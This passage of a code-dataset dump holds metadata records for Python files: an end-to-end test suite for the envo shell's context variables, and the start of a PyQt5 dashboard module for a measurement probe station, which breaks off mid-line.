"call"}, {"api_name": "numpy.pi", "line_number": 365, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 372, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 382, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 385, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 386, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 388, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 389, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 393, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 394, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 396, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 399, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 413, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 413, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 414, "usage_type": "attribute"}, {"api_name": "custom_logging.LOG", "line_number": 415, "usage_type": "call"}, {"api_name": "custom_logging.LogLevel.CRITICAL", "line_number": 415, "usage_type": "attribute"}, {"api_name": "custom_logging.LogLevel", "line_number": 415, "usage_type": "name"}, {"api_name": "pygame.display.set_caption", "line_number": 424, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 424, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 450, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 450, "usage_type": "attribute"}, {"api_name": "Mesh.Mesh", "line_number": 452, "usage_type": "name"}, {"api_name": "pygame.key.get_pressed", "line_number": 467, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 467, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_rel", "line_number": 470, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 470, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 473, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 473, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 482, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 485, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 487, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 489, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 491, "usage_type": "attribute"}, {"api_name": "pygame.K_q", "line_number": 493, "usage_type": "attribute"}, {"api_name": "pygame.K_e", "line_number": 495, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 506, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 516, "usage_type": "call"}, {"api_name": "Material.Material", "line_number": 518, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 535, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 535, "usage_type": "name"}, {"api_name": "blender.load_mesh", "line_number": 545, "usage_type": "call"}, {"api_name": "Quaternion.Quaternion.FromEuler", "line_number": 554, "usage_type": "call"}, {"api_name": "Quaternion.Quaternion", "line_number": 554, "usage_type": "name"}, {"api_name": "custom_logging.LOG", "line_number": 574, "usage_type": "call"}, {"api_name": "custom_logging.LogLevel.INFO", "line_number": 574, "usage_type": "attribute"}, {"api_name": "custom_logging.LogLevel", "line_number": 574, "usage_type": "name"}, {"api_name": "Programs.Programs", "line_number": 575, "usage_type": "name"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 594, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 595, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 596, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 597, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 598, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 599, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 600, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 601, "usage_type": "call"}, {"api_name": "PostProcessing.PostProcessing", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 608, "usage_type": "call"}, {"api_name": "InstancedField.InstancedField", "line_number": 610, "usage_type": "call"}, {"api_name": "blender.load_mesh", "line_number": 614, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 615, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 615, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 616, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 616, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 617, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 617, "usage_type": "name"}, {"api_name": "InstancedField.InstancedField", "line_number": 622, "usage_type": "call"}, {"api_name": "blender.load_mesh", "line_number": 626, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 627, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 627, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 629, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 629, "usage_type": "name"}, {"api_name": "InstancedField.InstancedField", "line_number": 634, "usage_type": "call"}, {"api_name": "blender.load_mesh", "line_number": 638, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 639, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 639, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 640, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 640, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 641, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 641, "usage_type": "name"}, {"api_name": "Water.Water", "line_number": 646, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 646, "usage_type": "call"}]}
+{"seq_id": "23317625372", "text": "from pathlib import Path\nfrom time import sleep\n\nfrom tests.e2e import utils\n\n\nclass TestShellContext(utils.TestBase):\n def test_simple_context(self, shell):\n context = {\n \"str_var\": \"str test value\",\n \"int_var\": 8,\n \"dict_var\": {\"nested_var\": \"some nested value\"},\n }\n utils.add_shell_context(context)\n e = shell.start()\n\n e.prompt().eval()\n\n shell.sendline(\"print(str_var)\")\n e.output(r\"str test value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var)\")\n e.output(r\"8\\n\").prompt().eval()\n\n shell.sendline('print(dict_var[\"nested_var\"])')\n e.output(r\"some nested value\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_multiple_contexts(self, shell):\n context1 = {\n \"str_var1\": \"str test1 value\",\n \"int_var1\": 8,\n }\n utils.add_shell_context(context1, name=\"context1\")\n\n context2 = {\n \"str_var2\": \"str test2 value\",\n \"int_var2\": 28,\n }\n utils.add_shell_context(context2, name=\"context2\")\n\n e = shell.start()\n\n e.prompt().eval()\n\n shell.sendline(\"print(str_var1)\")\n e.output(r\"str test1 value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var1)\")\n e.output(r\"8\\n\").prompt().eval()\n\n shell.sendline(\"print(str_var2)\")\n e.output(r\"str test2 value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var2)\")\n e.output(r\"28\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_contexts_inheritance(self, shell):\n context1 = {\n \"str_var1\": \"str test1 value\",\n \"int_var1\": 8,\n \"other_var\": \"other var value\",\n }\n utils.add_shell_context(context1, name=\"context1\")\n\n context2 = {\n \"str_var2\": \"str test2 value\",\n \"str_var1\": \"str test1 new value\",\n \"int_var2\": 28,\n }\n utils.add_shell_context(context2, name=\"context2\", file=Path(\"env_test.py\"))\n e = shell.start()\n\n e.prompt().eval()\n\n shell.sendline(\"print(str_var1)\")\n e.output(r\"str test1 new value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var1)\")\n e.output(r\"8\\n\").prompt().eval()\n\n shell.sendline(\"print(str_var2)\")\n e.output(r\"str test2 value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var2)\")\n e.output(r\"28\\n\").prompt().eval()\n\n shell.sendline(\"print(other_var)\")\n e.output(r\"other var value\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_slow_context(self, shell):\n utils.add_command(\n \"\"\"\n @shell_context\n def some_context(self) -> Dict[str, Any]:\n from time import sleep\n sleep(4.0)\n return {\"slow_var\": \"slow var value\"}\n \"\"\"\n )\n shell.start(False)\n e = shell.expecter\n\n e.prompt(utils.PromptState.LOADING)\n\n shell.sendline(\"print(slow_var)\")\n e.output(r\"NameError: name 'slow_var' is not defined\\n\")\n e.prompt(utils.PromptState.MAYBE_LOADING).eval()\n\n e.expected.pop()\n e.prompt().eval()\n\n shell.sendline(\"print(slow_var)\")\n e.output(r\"slow var value\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_error_in_context(self, shell):\n utils.add_command(\n \"\"\"\n @shell_context\n def some_context(self) -> Dict[str, Any]:\n return {\"var\": 1/0}\n \"\"\"\n )\n shell.start(False)\n e = shell.expecter\n\n e.output(fr\".*{ZeroDivisionError.__name__}.*\")\n e.prompt().eval()\n\n shell.sendline(\"var\")\n e.output(r\".*not found.*\")\n\n shell.exit()\n e.exit().eval()\n\n def test_context_shadowing(self, shell):\n utils.add_command(\n \"\"\"\n @shell_context\n def __some_context(self) -> Dict[str, Any]:\n return {\"cake\": \"Sponge\"}\n \"\"\",\n Path(\"env_comm.py\"),\n )\n\n utils.add_command(\n \"\"\"\n @shell_context\n def __some_context(self) -> Dict[str, Any]:\n return {\"flavor\": \"Caramel\"}\n \"\"\",\n Path(\"env_test.py\"),\n )\n\n shell.start()\n e = shell.expecter\n\n e.prompt().eval()\n\n shell.sendline(\"flavor\")\n e.output(fr\"'Caramel'\\n\")\n e.prompt().eval()\n\n shell.sendline(\"cake\")\n e.output(fr\"'Sponge'\\n\")\n e.prompt().eval()\n\n shell.exit()\n e.exit().eval()\n", "repo_name": "reloadware/envo", "sub_path": "tests/e2e/test_shell_context.py", "file_name": "test_shell_context.py", "file_ext": "py", "file_size_in_byte": 4703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tests.e2e.utils.TestBase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "tests.e2e.utils", "line_number": 7, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 14, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 14, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 36, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 36, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 42, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 42, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 69, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 76, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 76, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 100, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 100, "usage_type": "name"}, {"api_name": "tests.e2e.utils.PromptState", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tests.e2e.utils", "line_number": 112, "usage_type": "name"}, {"api_name": "tests.e2e.utils.PromptState", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tests.e2e.utils", "line_number": 116, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 128, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 128, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 148, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 148, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 154, "usage_type": "call"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 157, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 157, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "11949540277", "text": "import json\nimport logging\nimport math\nimport os\nimport time\nimport threading\nimport webbrowser\nfrom typing import Optional\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport comet\nfrom comet.process import ProcessMixin\nfrom ..workers.measure import MeasureWorker\nfrom .components import (\n CalibrationWidget,\n OperatorWidget,\n PositionWidget,\n ToggleButton,\n WorkingDirectoryWidget,\n)\nfrom ..core import config\nfrom ..core.position import Position\nfrom ..core.utils import make_path\nfrom .sequence import (\n GroupTreeItem,\n ContactTreeItem,\n EditSamplesDialog,\n MeasurementTreeItem,\n SequenceRootTreeItem,\n SampleTreeItem,\n SequenceTreeWidget,\n StartSequenceDialog,\n)\nfrom .sequencemanager import load_all_sequences\nfrom ..settings import settings\nfrom .alignment import AlignmentDialog, safe_z_position\nfrom .environmentwidget import EnvironmentWidget\nfrom .measurementwidget import MeasurementWidget\nfrom ..utils import caldone_valid\n\nlogger = logging.getLogger(__name__)\n\n\nclass SequenceWidget(QtWidgets.QGroupBox):\n\n def __init__(self, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n\n self.setTitle(\"Sequence\")\n self.sequenceTreeWidget = SequenceTreeWidget(self)\n self.sequenceTreeWidget.setMinimumWidth(360)\n\n self.startButton = QtWidgets.QPushButton(self)\n self.startButton.setText(\"Start\")\n self.startButton.setToolTip(\"Start measurement sequence.\")\n self.startButton.setStyleSheet(\"QPushButton:enabled{color:green;font-weight:bold;}\")\n\n self.stopButton = QtWidgets.QPushButton(self)\n self.stopButton.setText(\"Stop\")\n self.stopButton.setToolTip(\"Stop measurement sequence.\")\n self.stopButton.setEnabled(False)\n self.stopButton.setStyleSheet(\"QPushButton:enabled{color:red;font-weight:bold;}\")\n\n self.resetButton = QtWidgets.QPushButton(self)\n self.resetButton.setText(\"Reset\")\n self.resetButton.setToolTip(\"Reset measurement sequence state.\")\n\n self.editButton = QtWidgets.QPushButton(self)\n self.editButton.setText(\"Edit\")\n self.editButton.setToolTip(\"Quick edit properties of sequence items.\",)\n\n self.reloadConfigButton = QtWidgets.QToolButton(self)\n\n self.addSampleButton = QtWidgets.QToolButton(self)\n\n self.addGroupButton = QtWidgets.QToolButton(self)\n\n self.removeSampleButton = QtWidgets.QToolButton(self)\n\n self.collapseAllSamplesButton = QtWidgets.QToolButton(self)\n self.collapseAllSamplesButton.triggered.connect(self.collapseAllSamples)\n\n self.buttonLayout = QtWidgets.QHBoxLayout()\n self.buttonLayout.addWidget(self.startButton)\n self.buttonLayout.addWidget(self.stopButton)\n self.buttonLayout.addWidget(self.resetButton)\n self.buttonLayout.addWidget(self.editButton)\n self.buttonLayout.addWidget(self.reloadConfigButton)\n self.buttonLayout.addWidget(self.addSampleButton)\n self.buttonLayout.addWidget(self.addGroupButton)\n self.buttonLayout.addWidget(self.removeSampleButton)\n self.buttonLayout.addWidget(self.collapseAllSamplesButton)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(self.sequenceTreeWidget)\n layout.addLayout(self.buttonLayout)\n\n def readSettings(self):\n samples = settings.settings.get(\"sequence_samples\", [])\n self.sequenceTreeWidget.clear()\n for kwargs in samples:\n if \"group_samples\" in kwargs:\n item = GroupTreeItem()\n else:\n item = SampleTreeItem()\n self.sequenceTreeWidget.addTopLevelItem(item)\n item.setExpanded(False)\n try:\n item.from_settings(**kwargs)\n except Exception as exc:\n logger.error(exc)\n if self.sequenceTreeWidget.topLevelItemCount():\n self.sequenceTreeWidget.setCurrentItem(self.sequenceTreeWidget.topLevelItem(0))\n self.sequenceTreeWidget.resizeColumns()\n\n def writeSettings(self):\n sequence_samples = [sample.to_settings() for sample in self.sequenceTreeWidget.sequenceItems()]\n settings.settings[\"sequence_samples\"] = sequence_samples\n\n def setLocked(self, locked: bool) -> None:\n self.startButton.setEnabled(not locked)\n self.stopButton.setEnabled(locked)\n self.resetButton.setEnabled(not locked)\n self.editButton.setEnabled(not locked)\n self.reloadConfigButton.setEnabled(not locked)\n self.addSampleButton.setEnabled(not locked)\n self.removeSampleButton.setEnabled(not locked)\n self.collapseAllSamplesButton.setEnabled(not locked)\n self.sequenceTreeWidget.setLocked(locked)\n\n def stop(self):\n self.stopButton.setEnabled(False)\n\n def reloadConfig(self) -> None:\n result = QtWidgets.QMessageBox.question(self, \"Reload Configuration\", \"Do you want to reload sequence configurations from file?\")\n if result == QtWidgets.QMessageBox.Yes:\n progress = QtWidgets.QProgressDialog(self)\n progress.setLabelText(\"Reloading sequences...\")\n progress.setMaximum(len(self.sequenceTreeWidget.sampleItemsOnly()))\n progress.setCancelButton(None)\n\n def callback():\n try:\n for sample_item in self.sequenceTreeWidget.sampleItemsOnly():\n progress.setValue(progress.value() + 1)\n if sample_item.sequence:\n filename = sample_item.sequence.filename\n sequence = config.load_sequence(filename)\n sample_item.load_sequence(sequence)\n finally:\n progress.close()\n\n QtCore.QTimer.singleShot(200, callback)\n progress.exec()\n\n def collapseAllSamples(self) -> None:\n\n def collapse(item):\n if isinstance(item, (SampleTreeItem, ContactTreeItem, MeasurementTreeItem)):\n item.setExpanded(False)\n for index in range(item.childCount()):\n collapse(item.child(index))\n\n collapse(self.sequenceTreeWidget.invisibleRootItem())\n\n def addSampleItem(self) -> None:\n item = SampleTreeItem()\n item.setNameInfix(\"Unnamed Sample\")\n item.setEnabled(True)\n self.sequenceTreeWidget.addSampleItem(item)\n self.sequenceTreeWidget.setCurrentItem(item)\n self.sequenceTreeWidget.resizeColumns()\n\n def addGroupItem(self) -> None:\n item = GroupTreeItem()\n item.setName(\"Unnamed Group\")\n item.setEnabled(True)\n self.sequenceTreeWidget.addGroupItem(item)\n self.sequenceTreeWidget.setCurrentItem(item)\n self.sequenceTreeWidget.resizeColumns()\n\n def removeCurrentSampleItem(self) -> None:\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, SampleTreeItem):\n result = QtWidgets.QMessageBox.question(self, \"Remove Sample\", f\"Do you want to remove sample {item.name()!r}?\")\n if result == QtWidgets.QMessageBox.Yes:\n self._removeSequenceItem(item)\n elif isinstance(item, GroupTreeItem):\n result = QtWidgets.QMessageBox.question(self, \"Remove Group\", f\"Do you want to remove group {item.name()!r}?\")\n if result == QtWidgets.QMessageBox.Yes:\n self._removeSequenceItem(item)\n\n def _removeSequenceItem(self, item):\n parent = item.parent()\n if parent is None:\n index = self.sequenceTreeWidget.indexOfTopLevelItem(item)\n self.sequenceTreeWidget.takeTopLevelItem(index)\n else:\n index = parent.indexOfChild(item)\n parent.takeChild(index)\n\n\nclass TableControlWidget(QtWidgets.QGroupBox):\n\n joystickToggled = QtCore.pyqtSignal(bool)\n controlClicked = QtCore.pyqtSignal()\n\n def __init__(self, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n self.setTitle(\"Table\")\n self.setCheckable(True)\n\n self.joystickButton: ToggleButton = ToggleButton(self)\n self.joystickButton.setText(\"Joystick\")\n self.joystickButton.setToolTip(\"Toggle table joystick\")\n self.joystickButton.toggled.connect(self.joystickToggled.emit)\n\n self.positionWidget = PositionWidget()\n\n self.calibrationWidget = CalibrationWidget()\n\n self.alignmentButton = QtWidgets.QPushButton(self)\n self.alignmentButton.setIcon(QtGui.QIcon(make_path(\"assets\", \"icons\", \"alignment.svg\")))\n self.alignmentButton.setText(\"Alignment...\")\n self.alignmentButton.setToolTip(\"Open table controls dialog.\")\n self.alignmentButton.clicked.connect(self.controlClicked.emit)\n\n # Layout\n\n layout = QtWidgets.QGridLayout(self)\n layout.addWidget(self.positionWidget, 0, 0, 4, 1)\n layout.addWidget(self.calibrationWidget, 0, 1, 4, 1)\n layout.addWidget(self.alignmentButton, 1, 3)\n layout.addWidget(self.joystickButton, 2, 3)\n layout.setColumnStretch(2, 1)\n\n # Callbacks\n self._joystick_limits = [0, 0, 0]\n self._calibration_valid: bool = False\n\n def isCalibrationValid(self) -> bool:\n return self._calibration_valid\n\n def setJoystickEnabled(self, enabled: bool) -> None:\n self.joystickButton.setChecked(enabled)\n\n def setPosition(self, position: Position) -> None:\n self.positionWidget.setPosition(position)\n limits = self._joystick_limits\n enabled = position.x <= limits[0] and position.y <= limits[1] and position.z <= limits[2]\n self.joystickButton.setEnabled(enabled and self._calibration_valid)\n\n def setCalibration(self, position: Position) -> None:\n self.calibrationWidget.setCalibration(position)\n self._calibration_valid = caldone_valid(position)\n\n def readSettings(self) -> None:\n use_table = settings.settings.get(\"use_table\") or False\n self.setChecked(use_table)\n self._joystick_limits = settings.table_joystick_maximum_limits\n\n\nclass EnvironmentControlWidget(QtWidgets.QGroupBox):\n\n def __init__(self, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n self.setTitle(\"Environment Box\")\n self.setCheckable(True)\n\n self.laserSensorButton: ToggleButton = ToggleButton(self)\n self.laserSensorButton.setText(\"Laser\")\n self.laserSensorButton.setToolTip(\"Toggle laser\")\n\n self.boxLightButton: ToggleButton = ToggleButton(self)\n self.boxLightButton.setText(\"Box Light\")\n self.boxLightButton.setToolTip(\"Toggle box light\")\n\n self.microscopeLightButton: ToggleButton = ToggleButton(self)\n self.microscopeLightButton.setText(\"Mic Light\")\n self.microscopeLightButton.setToolTip(\"Toggle microscope light\")\n\n self.microscopeCameraButton: ToggleButton = ToggleButton(self)\n self.microscopeCameraButton.setText(\"Mic Cam\")\n self.microscopeCameraButton.setToolTip(\"Toggle microscope camera power\")\n\n self.microscopeControlButton: ToggleButton = ToggleButton(self)\n self.microscopeControlButton.setText(\"Mic Ctrl\")\n self.microscopeControlButton.setToolTip(\"Toggle microscope control\")\n\n self.probecardLightButton: ToggleButton = ToggleButton(self)\n self.probecardLightButton.setText(\"PC Light\")\n self.probecardLightButton.setToolTip(\"Toggle probe card light\")\n\n self.probecardCameraButton: ToggleButton = ToggleButton(self)\n self.probecardCameraButton.setText(\"PC Cam\")\n self.probecardCameraButton.setToolTip(\"Toggle probe card camera power\")\n\n self.pidControlButton: ToggleButton = ToggleButton(self)\n self.pidControlButton.setText(\"PID Control\")\n self.pidControlButton.setToolTip(\"Toggle PID control\")\n\n layout = QtWidgets.QGridLayout(self)\n layout.addWidget(self.laserSensorButton, 0, 0)\n layout.addWidget(self.microscopeCameraButton, 1, 0)\n layout.addWidget(self.boxLightButton, 0, 1)\n layout.addWidget(self.probecardCameraButton, 1, 1)\n layout.addWidget(self.microscopeLightButton, 0, 2)\n layout.addWidget(self.microscopeControlButton, 1, 2)\n layout.addWidget(self.probecardLightButton, 0, 3)\n layout.addWidget(self.pidControlButton, 1, 3)\n\n def updateLaserSensorState(self, state: bool) -> None:\n self.laserSensorButton.setChecked(state)\n\n def updateBoxLightState(self, state: bool) -> None:\n self.boxLightButton.setChecked(state)\n\n def updateMicroscopeLightState(self, state: bool) -> None:\n self.microscopeLightButton.setChecked(state)\n\n def updateMicroscopeCameraState(self, state: bool) -> None:\n self.microscopeCameraButton.setChecked(state)\n\n def updateMicroscopeControlState(self, state: bool) -> None:\n self.microscopeControlButton.setChecked(state)\n\n def updateProbecardLightState(self, state: bool) -> None:\n self.probecardLightButton.setChecked(state)\n\n def updateProbecardCameraState(self, state: bool) -> None:\n self.probecardCameraButton.setChecked(state)\n\n def updatePidControlState(self, state: bool) -> None:\n self.pidControlButton.setChecked(state)\n\n\nclass AnimatedLabel(QtWidgets.QLabel):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.animation = QtCore.QVariantAnimation()\n self.animation.setStartValue(QtGui.QColor('yellow'))\n self.animation.setKeyValueAt(0.5, QtGui.QColor('orange'))\n self.animation.setEndValue(QtGui.QColor('yellow'))\n self.animation.setDuration(4000)\n self.animation.valueChanged.connect(self.updateColor)\n self.animation.setLoopCount(-1)\n self.animation.start()\n\n def updateColor(self, color):\n palette = self.palette()\n palette.setColor(self.backgroundRole(), QtGui.QColor(color))\n self.setPalette(palette)\n self.setAutoFillBackground(True)\n\n\nclass Dashboard(QtWidgets.QWidget, ProcessMixin):\n\n sample_count = 4\n\n messageChanged = QtCore.pyqtSignal(str)\n progressChanged = QtCore.pyqtSignal(int, int)\n started = QtCore.pyqtSignal()\n aborting = QtCore.pyqtSignal()\n finished = QtCore.pyqtSignal()\n failed = QtCore.pyqtSignal(Exception, object)\n\n def __init__(self, station, plugins, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n self.station = station\n self.plugins = plugins\n\n self.measure_thread = None\n\n self.noticeLabel = AnimatedLabel(self)\n self.noticeLabel.setText(\"Temporary Probecard Z-Limit applied. Revert after finishing current measurements.\")\n # self.noticeLabel.setStyleSheet(\"QLabel{color: black; background-color: yellow; padding: 8px; border-radius: 0;}\")\n self.noticeLabel.setStyleSheet(\"QLabel{color: black; padding: 8px; border-radius: 0;}\")\n self.noticeLabel.setVisible(False)\n self.noticeLabel.animation.start()\n\n self.sequenceControlWidget = SequenceWidget(self)\n\n self.sequenceTreeWidget = self.sequenceControlWidget.sequenceTreeWidget\n self.sequenceTreeWidget.currentItemChanged.connect(self.on_tree_selected)\n self.sequenceTreeWidget.itemDoubleClicked.connect(self.on_tree_double_clicked)\n\n # Environment Controls\n\n self.environmentControlWidget = EnvironmentControlWidget(self)\n self.environmentControlWidget.toggled.connect(self.on_environment_groupbox_toggled)\n self.environmentControlWidget.laserSensorButton.toggled.connect(self.on_laser_sensor_toggled)\n self.environmentControlWidget.boxLightButton.toggled.connect(self.on_box_light_toggled)\n self.environmentControlWidget.microscopeLightButton.toggled.connect(self.on_microscope_light_toggled)\n self.environmentControlWidget.microscopeCameraButton.toggled.connect(self.on_microscope_camera_toggled)\n self.environmentControlWidget.microscopeControlButton.toggled.connect(self.on_microscope_control_toggled)\n self.environmentControlWidget.probecardLightButton.toggled.connect(self.on_probecard_light_toggled)\n self.environmentControlWidget.probecardCameraButton.toggled.connect(self.on_probecard_camera_toggled)\n self.environmentControlWidget.pidControlButton.toggled.connect(self.on_pid_control_toggled)\n\n # Table controls\n\n self.tableControlWidget = TableControlWidget(self)\n self.tableControlWidget.toggled.connect(self.on_table_groupbox_toggled)\n self.tableControlWidget.joystickToggled.connect(self.on_table_joystick_toggled)\n self.tableControlWidget.controlClicked.connect(self.on_table_control_clicked)\n\n # Operator\n\n self.operatorWidget = OperatorWidget(self)\n\n # Working directory\n\n self.outputWidget = WorkingDirectoryWidget(self)\n self.outputWidget.setTitle(\"Working Directory\")\n\n # Controls\n\n self.controlWidget = QtWidgets.QWidget(self)\n\n controlWidgetLayout = QtWidgets.QGridLayout(self.controlWidget)\n controlWidgetLayout.setContentsMargins(0, 0, 0, 0)\n controlWidgetLayout.addWidget(self.sequenceControlWidget, 0, 0, 1, 2)\n controlWidgetLayout.addWidget(self.tableControlWidget, 1, 0, 1, 2)\n controlWidgetLayout.addWidget(self.environmentControlWidget, 2, 0, 1, 2)\n controlWidgetLayout.addWidget(self.operatorWidget, 3, 0, 1, 1)\n controlWidgetLayout.addWidget(self.outputWidget, 3, 1, 1, 1)\n controlWidgetLayout.setRowStretch(0, 1)\n controlWidgetLayout.setColumnStretch(0, 3)\n controlWidgetLayout.setColumnStretch(1, 7)\n\n # Tabs\n\n self.measurementWidget = MeasurementWidget()\n self.measurementWidget.restoreDefaults.connect(self.restoreDefaults)\n\n self.environmentWidget = EnvironmentWidget()\n\n self.panels = self.measurementWidget.panels\n self.panels.sampleChanged.connect(lambda _: self.sequenceTreeWidget.resizeColumns())\n self.panels.groupChanged.connect(lambda _: self.sequenceTreeWidget.resizeColumns())\n\n # Tabs\n\n self.tabWidget = QtWidgets.QTabWidget(self)\n self.tabWidget.addTab(self.measurementWidget, \"Measurement\")\n self.tabWidget.addTab(self.environmentWidget, \"Environment\")\n\n # Layout\n\n self.splitter = QtWidgets.QSplitter(self)\n self.splitter.setChildrenCollapsible(False)\n self.splitter.addWidget(self.controlWidget)\n self.splitter.addWidget(self.tabWidget)\n self.splitter.setStretchFactor(0, 4)\n self.splitter.setStretchFactor(1, 9)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(0)\n layout.addWidget(self.noticeLabel, 0)\n self.splitterWrapper = QtWidgets.QWidget()\n layout.addWidget(self.splitterWrapper, 1)\n wrapperLayout = QtWidgets.QVBoxLayout(self.splitterWrapper)\n wrapperLayout.addWidget(self.splitter)\n\n # Setup process callbacks\n\n self.environ_worker = self.station.environ_worker\n self.environ_worker.pc_data_updated = self.setPCData\n self.environ_worker.failed = self.failed.emit\n\n self.table_worker = self.station.table_worker\n self.table_worker.joystick_changed = self.on_table_joystick_changed\n self.table_worker.position_changed = self.on_table_position_changed\n self.table_worker.caldone_changed = self.on_table_calibration_changed\n self.table_worker.failed = self.failed.emit\n\n self.contact_quality_process = self.processes.get(\"contact_quality\")\n self.contact_quality_process.failed = self.failed.emit\n\n def readSettings(self):\n settings_ = QtCore.QSettings()\n settings_.beginGroup(\"dashboard\")\n self.splitter.restoreState(settings_.value(\"splitterState\", QtCore.QByteArray(), QtCore.QByteArray))\n settings_.endGroup()\n\n self.sequenceControlWidget.readSettings()\n use_environ = 